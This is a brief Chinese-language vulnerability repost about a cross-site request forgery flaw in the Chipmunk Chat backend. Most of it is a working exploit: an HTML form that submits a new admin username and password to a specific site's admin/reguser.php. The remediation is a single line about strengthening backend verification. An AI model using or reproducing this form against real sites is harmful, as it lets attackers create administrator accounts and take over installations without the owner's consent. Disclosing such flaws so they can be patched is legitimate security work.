Chipmunk Chat 程序后台缺少验证,导致CSRF攻击远程添加管理员 漏洞 。
Exp
< html > <form method="post" action=" http://www.chinasg.tk/admin/reguser.php "> Type Username Here: <input type="text" name="adminname" size="15"><br> Type Password Here: <input type="text" name="password" size="15"><br> Retype password: <input type="text" name="pass2" size="15"><br> <input type="submit" value="submit">
</form> </html>
修复:
加强后台验证
查看更多关于Chipmunk Chat CSRF远程攻击漏洞及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11177